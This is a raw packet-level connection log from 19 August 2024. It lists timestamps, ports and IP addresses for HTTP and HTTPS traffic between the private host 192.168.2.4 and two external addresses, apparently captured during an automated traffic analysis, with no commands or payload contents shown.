Aug 19, 2024 06:06:10.239272118 CEST	49874	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:10.243288040 CEST	49874	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:10.243762016 CEST	49876	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:10.248445034 CEST	80	49874	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:10.248507977 CEST	49874	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:10.248564959 CEST	80	49876	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:10.248636007 CEST	49876	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:10.248833895 CEST	49876	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:10.253631115 CEST	80	49876	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:10.554824114 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.554888010 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.554899931 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.554920912 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.554953098 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.554965019 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.555002928 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.555008888 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.555051088 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.584923029 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.584971905 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.584992886 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.585004091 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.585042000 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.585059881 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.650357962 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.650388002 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.650448084 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.650461912 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.650481939 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.650500059 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.680433989 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.680454969 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.680490971 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.680499077 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.680519104 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.680541992 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.718305111 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.718341112 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.718491077 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.718508959 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.718550920 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.744101048 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.744148016 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.744220972 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.744231939 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.744247913 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.744282007 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.763901949 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.763947964 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.763981104 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.763988018 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.764014959 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.764050961 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.779161930 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.779205084 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.779232025 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.779246092 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.779272079 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.779305935 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.797446966 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.797488928 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.797527075 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.797533989 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.797558069 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.797624111 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.814754963 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.814800978 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.814834118 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.814840078 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.814870119 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.814893961 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.827719927 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.827764988 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.827784061 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.827791929 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.827827930 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.827841997 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.842012882 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.842055082 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.842072964 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.842089891 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.842094898 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.842179060 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.854459047 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.854506016 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.854528904 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.854536057 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.854573011 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.854593039 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.863441944 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.863490105 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.863528013 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.863534927 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.863550901 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.863571882 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.873271942 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.873315096 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.873332024 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.873341084 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.873404980 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.881047964 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.881093025 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.881128073 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.881128073 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.881139040 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.881160021 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.881206036 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.889597893 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.889653921 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.889688969 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.889694929 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.889703989 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.889763117 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.898964882 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.899028063 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.899059057 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.899065971 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.899085045 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.899108887 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.909982920 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.910044909 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.910075903 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.910084009 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.910119057 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.910156965 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.922065020 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.922108889 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.922135115 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.922141075 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.922195911 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.922195911 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.935807943 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.935859919 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.935873985 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.935940027 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.935946941 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.935986996 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.947088003 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.947134972 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.947168112 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.947175026 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.947196960 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.947237968 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.955703974 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.955744028 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.955776930 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.955785036 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.955812931 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.955832958 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.966645956 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.966689110 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.966718912 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.966727972 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.966784000 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.972367048 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.972410917 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.972445965 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.972453117 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.972476959 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.972503901 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.980917931 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.980961084 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.980992079 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.980999947 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.981024981 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.981059074 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.991424084 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.991470098 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.991503000 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.991508961 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.991530895 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.991559982 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.009114027 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.009160995 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.009175062 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.009197950 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.009203911 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.009232998 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.009265900 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.011564016 CEST	80	49876	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:11.011637926 CEST	49876	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.022617102 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.022660017 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.022710085 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.022716045 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.022732019 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.022797108 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.034008026 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.034056902 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.034095049 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.034101963 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.034123898 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.034149885 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.042702913 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.042747021 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.042779922 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.042785883 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.042813063 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.042850971 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.053484917 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.053527117 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.053560972 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.053567886 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.053596020 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.053642035 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.059820890 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.059863091 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.059901953 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.059910059 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.059978008 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.059978008 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.067955017 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.068008900 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.068034887 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.068042040 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.068103075 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.068103075 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.078607082 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.078650951 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.078681946 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.078690052 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.078725100 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.078764915 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.096097946 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.096144915 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.096188068 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.096194983 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.096218109 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.096342087 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.109566927 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.109626055 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.109751940 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.109751940 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.109761000 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.109945059 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.121124983 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.121165991 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.121244907 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.121244907 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.121253014 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.121380091 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.122890949 CEST	49876	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.126507998 CEST	49877	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.127938986 CEST	80	49876	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:11.129511118 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.129556894 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.129604101 CEST	49876	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.129650116 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.129650116 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.129657030 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.130656004 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.131330967 CEST	80	49877	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:11.134942055 CEST	49877	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.135107040 CEST	49877	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.139849901 CEST	80	49877	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:11.143136024 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.143179893 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.143218040 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.143224955 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.143250942 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.143351078 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.150394917 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.150435925 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.150476933 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.150482893 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.150509119 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.150638103 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.154784918 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.154843092 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.154877901 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.154885054 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.154949903 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.154997110 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.158813000 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.158823013 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.158849955 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.447789907 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.447833061 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.448255062 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.448501110 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:11.448508978 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:11.913244963 CEST	80	49877	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:11.915718079 CEST	49877	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.981554031 CEST	49877	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.984988928 CEST	49879	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.986748934 CEST	80	49877	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:11.986908913 CEST	49877	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.989778996 CEST	80	49879	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:11.990968943 CEST	49879	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.995177984 CEST	49879	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:11.999994040 CEST	80	49879	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:12.100445032 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.100517988 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.104290962 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.104296923 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.108618975 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.108625889 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.524812937 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.524862051 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.524873972 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.524904966 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.524939060 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.524945021 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.524996042 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.525013924 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.525027037 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.525052071 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.554982901 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.555033922 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.555089951 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.555105925 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.555124998 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.555186033 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.620306015 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.620348930 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.620400906 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.620415926 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.620445967 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.620497942 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.650618076 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.650677919 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.650713921 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.650724888 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.650753021 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.650762081 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.688354015 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.688415051 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.688446045 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.688457966 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.688488007 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.688488007 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.688509941 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.713864088 CEST	443	49878	195.201.118.191	192.168.2.4
